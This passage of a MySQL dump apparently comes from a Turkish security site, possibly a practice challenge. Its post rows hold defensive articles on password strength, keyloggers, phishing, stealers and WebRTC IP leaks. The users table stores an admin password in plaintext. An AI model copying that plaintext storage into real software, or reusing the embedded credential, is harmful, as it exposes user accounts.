style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">canyoupwnme</span></span></span> olsun;</li>\r\n</ul>\r\n<p><img class="size-full wp-image-5111 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/12/ss2.png" alt="" width="1903" height="468" srcset="https://canyoupwn.me/wp-content/uploads/2016/12/ss2.png 1903w, https://canyoupwn.me/wp-content/uploads/2016/12/ss2-300x74.png 300w, https://canyoupwn.me/wp-content/uploads/2016/12/ss2-768x189.png 768w, https://canyoupwn.me/wp-content/uploads/2016/12/ss2-1024x252.png 1024w" sizes="(max-width: 1903px) 100vw, 1903px" /></p>\r\n<p> </p>\r\n<ul>\r\n<li>Bu şifrenin kırılması 1 gün olacakmış. Şimdi \r\n <span id="crayon-5884b268184d8973795352" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">CanYouPwnMe</span></span></span> yazıyorum;</li>\r\n</ul>\r\n<p><img class="size-full wp-image-5112 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/12/ss3.png" alt="" width="1903" height="456" srcset="https://canyoupwn.me/wp-content/uploads/2016/12/ss3.png 1903w, https://canyoupwn.me/wp-content/uploads/2016/12/ss3-300x72.png 300w, https://canyoupwn.me/wp-content/uploads/2016/12/ss3-768x184.png 768w, https://canyoupwn.me/wp-content/uploads/2016/12/ss3-1024x245.png 1024w" sizes="(max-width: 1903px) 100vw, 1903px" /></p>\r\n<p> </p>\r\n<ul>\r\n<li>Görüldüğü üzere sadece kelimelerin baş harflerini büyük yazarak süreyi 6 yıla çıkardım. Bir de işin içine rakam ve özel karakterleri katalım. \r\n <span id="crayon-5884b268184dc871068692" class="crayon-syntax crayon-syntax-inline crayon-theme-github crayon-theme-github-inline crayon-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre crayon-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">C</span><span class="crayon-sy">@</span><span class="crayon-v">nY0uPwnM3</span></span></span> yeni parolamız;</li>\r\n</ul>\r\n<p><img class="size-full wp-image-5113 aligncenter" src="https://canyoupwn.me/wp-content/uploads/2016/12/ss4.png" alt="" width="1920" height="517" srcset="https://canyoupwn.me/wp-content/uploads/2016/12/ss4.png 1920w, https://canyoupwn.me/wp-content/uploads/2016/12/ss4-300x81.png 300w, https://canyoupwn.me/wp-content/uploads/2016/12/ss4-768x207.png 768w, https://canyoupwn.me/wp-content/uploads/2016/12/ss4-1024x276.png 1024w" sizes="(max-width: 1920px) 100vw, 1920px" /></p>\r\n<ul>\r\n<li class="western">Parolamızın kırılması için 400 yıl gerekiyor ki bu gerçekten çok uzun bir süre 🙂</li>\r\n</ul>\r\n<p>Güçlü bir parola oluşturduk fakat bunun kötü niyetli kişiler tarafından öğrenilmemesi için ne yapmalıyız. İlk başta bizim parolamıza başka insanlar nasıl erişebilir onların yollarına bakalım.Kötü amaçlı kişiler, gizli bilgilerinize ulaşmak için keylogger denilen küçük ve sizler tarafından farkedemeyeceğiniz programlardan faydalanırlar.<br />\r\nBu programlar virüs niteliğinde olup, bilgisayarlarınıza resim, ses dosyası, video dosyası, mail ve çeşitli dosyalarla bulaştırılırlar. Keyloggerin görevi, sizin klavye kullanırken bastığınız tuşların harf ve rakam karşılıklarını, kötü amaçlı korsan kişiye yollamaktır. Böylelikle gizli bilgileriniz ve şifreleriniz ele geçirilmiş olur.</p>\r\n<p><strong>KeyScrambler </strong>, sizi bu duruma karşı koruyabilecek önemli bir güvenlik yazılımıdır. KeyScrambler Personal, sizin klavye ve tuş verilerinizi 38 farklı tarayıcıda koruyacak şekilde yapılmıştır. Artık siz klavyede yazmaya başladığınız andan itibaren, klavye vuruşlarınız şifrelenmeye başlayarak bilgilerinize ulaşılmasını engelleyecek. Özellikle şifre ve parola kullanarak girdiğiniz çok önemli sitelerde, gizlilik oldukça önemlidir. Bununla beraber online bankacılık güvenliği anlamında hayati önem teşkil eden güvenlik sorunlarının başında keyloggerlar gelir. Bu yazılım sayesinde, online bankacılık işlemlerinizi güvenle yapabileceksiniz.</p>\r\n<p>Genel olarak stealer ve keyloggerlar TCP yerine UDP protokollerini kullanır. UDP daha az güvelidir bunun sebebi ise UDP debugging ve veriyi yeniden yollamayı desteklemez. Programınız TCP protokolünü desteklemiyor ise bu bir problem olabilir.</p>\r\n<h2>Phishingler</h2>\r\n<p>Phishinglere gelecek olursak phishingler de bir web sitenin kopyasıdır dersek yeridir. Phishingler sayesinde kullanıcılara girmek istedikleri web sitenin kopyasını açtırırlar. Bu web siteye girdiğiniz zaman da kullanıcı adı ve şifre paneline herhangi bir kullanıcı adı veya şifre girerseniz kötü niyetli kişilere ulaşır ve kötü niyetli kişiler de bu verilerinizi ele geçirmiş olurlar. Bütün bu zararlılardan korunabilmeniz için yine sağlam bir anti virüs yazılımına ihtiyacınız vardır. Anti virüs yazılımı olarak da sizlere Avira veya ESET gibi anti virüs yazılımlarını önerebiliriz. Bu anti virüs yazılımlarının içerilerinde anti – phishing gibi özellikler vardır. Zaman içerisinde anti virüs yazılımları da bu virüslerin türevlerini tespit etmiş ve bu türevlere göre de özellikler sunmaya başlamışlardır.</p>\r\n<h2>Stealer Nedir?</h2>\r\n<p>Stealer analizi diğerlerine göre daha zor olan bilgisayar güvenliğini tehdit eden zararlı yazılımdır. Stealer açıldığında kayıtlı şifreleriniz ftp veya gmail adresine gönderilir. Başlangıca eklenmez bir defa çalıştıktan sonra kendini yok eder. Tabiki bu genel stealer tanımı. Artık yeni özellikler eklendi. Özel bir hedef için hazırlanır ve şifre alındıktan sonra dosya kendini siler. Tabiki bu silme tam anlamıyla olmaz, geri getirilebilir. Local stealerlar ise genelde unuttuğunuz şifreleri görmek için kullanılır. Yazılımı açtığınızda kayıtlı şifrelerin hepsi gösterilir.</p>\r\n<h3>Nasıl çalışır?</h3>\r\n<p>Bir builder vardır. Gerekli ayarları yaparsınız ve size bir server oluşturur. Karşı tarafa bu dosya sosyal mühendislik ile açtırılır. Açıldığı anda stealerın özelliğine göre bilgisayardaki kayıtlı şifreleri gönderir ve kendini siler. Antivirüsler yakalayamayabilir. Güvenlik duvarınız güçlüyse diske eriştiğini ve bağlantı verdiğini gösterecektir. Bağlantıyı iptal edemezseniz bütün şifrelerinizi değiştirmelisiniz.</p>\r\n<h3>Nasıl korunuruz?</h3>\r\n<p>Serveri not defterinde veya hex workshop‘da açarsanız genellikle bilgilere ulaşırsınız. Şifreler genelde base64 ile şifrelenir. İnternetten decode edebilirsiniz. Onun dışında antivirüsün yanında sağlam güvenlik duvarı gerekli. Bağlantınızı şifrelemeniz çeşitli stealerlara karşı korusada %100 koruma sağlamıyor. En sağlam önlem ise çerez tutmamak. Tarayıcınız her zaman gizli modda olsun, hem geçmişi kaydetmez hem de çerez tutmaz böylelikle kayıtlı şifreniz olmaz.</p>\r\n<p> </p>', '2017-01-22 16:25:52', 3, 'parola.jpg'),
(4, 1, 'WebRTC Nedir?', '<p>Real-Time Communications yani gerçek zamanlı iletişimdir. Ses, video ve data transferi için, javascript api kullanılarak yapılan açık kaynak bir projedir. Günümüzde tarayıcılardan tam destek almasından ve kolay geliştirebilir olmasından dolayı popülerleşmiştir. W3C ve IETF tarafından desteklenmektedir. Günümüzde tarayıcılara gömülü olarak gelmektedir. Özetle hiçbir kuruluma gerek duyulmaması, geliştirilebilir ve açık kaynak olması, topluluklar tarafından desteklenmesi sebebiyle popülaritesi artmıştır.</p>\r\n<p>Demo: https://www.appr.tc/<br />\r\nGüncellemeler için: https://webrtcweekly.com/<br />\r\nDetaylı bilgi için: https://webrtc.org/</p>\r\n<h2><span style="color: #ff6600;">WebRTC Leak<br />\r\n</span></h2>\r\n<p>Öncelikle zafiyeti anlamak için webrtc protokollerini inceleyelim.</p>\r\n<h3><b>Session Traversal Utilities for NAT</b> (<b>STUN</b>)</h3>\r\n<p>WebRTC eşler aracılığıyla data alışverişi yaptığı için bu alışverin sağlanmasında stun sunucuları kullanılır. Bağlantı sağlarken gönderilen bilgiler arasında lan ve wan bilgilerimiz de mevcut. Protokolün işleyişindeki mantıkda zafiyet ortataya çıkıyor. Buradaki ip bilgilerimiz gizlenmediği yani sunucu ve eş arasında saf halde veri akışi sağlandığı için bilgilerimiz sızıyor.</p>\r\n<h3><b>Traversal Using Relays around NAT (TURN) </b></h3>\r\n<p>Stun protokolünden farkı eşler arasındaki veri akışında köprü görevi görmesidir. Diğer eşe bilgi giderken turn sunucularından çıkış yapıldığı için kendi wan ve lan ip bilgilerimiz gizlenmiş olur.</p>\r\n<p>Zafiyetimiz web sitelerinin stun sunucularına yapılan istekteki ip bilgilerinin kaydedilmesinden ibaret. Vpn kullansanız dahi vpn protokolleri stun sunucularına giden bilgilerin kontrolünü yapmadığı için vpn sunucularının atadığı ip gözükmeyecektir. Bu durumda ister triple vpn, ister zenmate (ki kendisi oldukça güvensiz ama bir o kadar da popülerdir) isterseniz de adblock, ghostery, privacy badger gibi eklentileri kullanın, bu protokolün kontrolünü sağlamadığı için zafiyet giderilemeyecektir..</p>\r\n<h3><span style="color: #ff6600;">Zafiyet Tespiti ve Çözümü<br />\r\n</span></h3>\r\n<p><a href="http://berkimran.com.tr/ipleak/ipleak.html">http://berkimran.com.tr/ipleak/ipleak.html </a>adresinden sonuca bakalım. ( Proje için: https://github.com/diafygi/webrtc-ips)<br />\r\nTest edebileceğiniz siteler: https://www.browserleaks.com/webrtc , https://ipleak.net/ (user agent xss açığı mevcut tavsiye etmiyorum).</p>\r\n<div id="attachment_4732" style="width: 770px" class="wp-caption alignnone"><img class="wp-image-4732 size-full" src="https://canyoupwn.me/wp-content/uploads/2016/11/ipleak2.png" alt="ipleak2" width="760" height="258" srcset="https://canyoupwn.me/wp-content/uploads/2016/11/ipleak2.png 760w, https://canyoupwn.me/wp-content/uploads/2016/11/ipleak2-300x102.png 300w" sizes="(max-width: 760px) 100vw, 760px" /><p class="wp-caption-text">Default olarak gelen tarayıcı ayarlarıyla yapılan test sonucu</p></div>\r\n<p>Yukarıdaki ekran görüntüsünde tarayıcı olarak Chrome kullandım ve hiçbir güvenlik önlemi almadım. Bu durumda vpn, webproxy vs. kullanmak dahi bu bilgilerin sızmasında önlem olamaz. Pptp veya openvpn bağlantısı yapmanız da etkili olmayacaktır.<br />\r\nBu durumda çözümleri tarayıcılara göre ele almak gereklidir.</p>\r\n<h3>Firefox</h3>\r\n<ol>\r\n<li>Eklenti kurmakla çok basit çözülebilir. Ancak tarayıcı ayarlarını yapmak varken eklenti kullanmak çok da mantıklı değil. Disable WEBRTC eklentisi ile çözüm bulabilirsiniz.<br />\r\nhttps://addons.mozilla.org/en-US/firefox/addon/happy-bonobo-disable-webrtc/</li>\r\n<li>Adres satırına about:config yazarak giriş yapın. media.peerconnection.enabled değerinin false olduğundan emin olun. Zafiyet devam ederse aşağıdaki değerlerde de değişiklik yapın.<br />\r\nmedia.peerconnection.turn.disable = true<br />\r\nmedia.peerconnection.use_document_iceservers = false<br />\r\nmedia.peerconnection.video.enabled = false<br />\r\nmedia.peerconnection.identity.timeout = 1</li>\r\n</ol>\r\n<p> </p>\r\n<h3>Chrome</h3>\r\n<ol>\r\n<li>Şu an için sadece eklenti ile düzeltilebiliniyor. Tavsiyem Firefox kullanmanızdan yana.<br />\r\nLink: https://chrome.google.com/webstore/detail/webrtc-leak-prevent/eiadekoaikejlgdbkbdfeijglgfdalml/related</li>\r\n</ol>\r\n<p> </p>\r\n<h3><span style="color: #ff6600;">Sonuç</span></h3>\r\n<div id="attachment_4730" style="width: 956px" class="wp-caption alignnone"><img class="wp-image-4730 size-full" src="https://canyoupwn.me/wp-content/uploads/2016/11/ipleak.png" alt="ipleak" width="946" height="192" srcset="https://canyoupwn.me/wp-content/uploads/2016/11/ipleak.png 946w, https://canyoupwn.me/wp-content/uploads/2016/11/ipleak-300x61.png 300w, https://canyoupwn.me/wp-content/uploads/2016/11/ipleak-768x156.png 768w" sizes="(max-width: 946px) 100vw, 946px" /><p class="wp-caption-text">Gerekli önlemler alındığında sonuç.</p></div>\r\n<p>Firefox tarayıcımda gerekli önlemleri aldığımda bilgilerimizin korunduğunu görüyoruz.</p>', '2017-01-22 16:33:50', 4, 'ipleak2.png');
-- --------------------------------------------------------
--
-- Table structure for table `users`
--
CREATE TABLE `users` (
`user_id` int(11) NOT NULL,
`username` varchar(200) NOT NULL,
`password` varchar(200) NOT NULL,
`email` varchar(200) NOT NULL,
`created_at` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `users`
--
INSERT INTO `users` (`user_id`, `username`, `password`, `email`, `created_at`) VALUES
(1, 'admin', 'n0tth4th4rd', '[email protected]', '2017-01-19 13:59:40');
--
-- Indexes for dumped tables
--
--
-- Indexes for table `categories`
--
ALTER TABLE `categories`
ADD PRIMARY KEY (`category_id`);
--
-- Indexes for table `comments`
--
ALTER TABLE `comments`
ADD PRIMARY KEY (`comment_id`),
ADD KEY `post_id` (`post_id`);
--
-- Indexes for table `posts`
--
ALTER TABLE `posts`
ADD PRIMARY KEY (`post_id`),
ADD KEY `user_id` (`user_id`),
ADD KEY `category_id` (`category_id`);
--
-- Indexes for table `users`
--
ALTER TABLE `users`
ADD PRIMARY KEY (`user_id`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `categories`
--
ALTER TABLE `categories`
MODIFY `category_id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=8;
--
-- AUTO_INCREMENT for table `comments`
--
ALTER TABLE `comments`
MODIFY `comment_id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=48;
--
-- AUTO_INCREMENT for table `posts`
--
ALTER TABLE `posts`
MODIFY `post_id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=14;
--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
MODIFY `user_id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
--
-- Constraints for dumped tables
--
--
-- Constraints for table `posts`
--
ALTER TABLE `posts`
ADD CONSTRAINT `posts_ibfk_1` FOREIGN KEY (`user_id`) REFERENCES `users` (`user_id`) ON DELETE CASCADE ON UPDATE CASCADE,
ADD CONSTRAINT `posts_ibfk_2` FOREIGN KEY (`category_id`) REFERENCES `categories` (`category_id`);
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;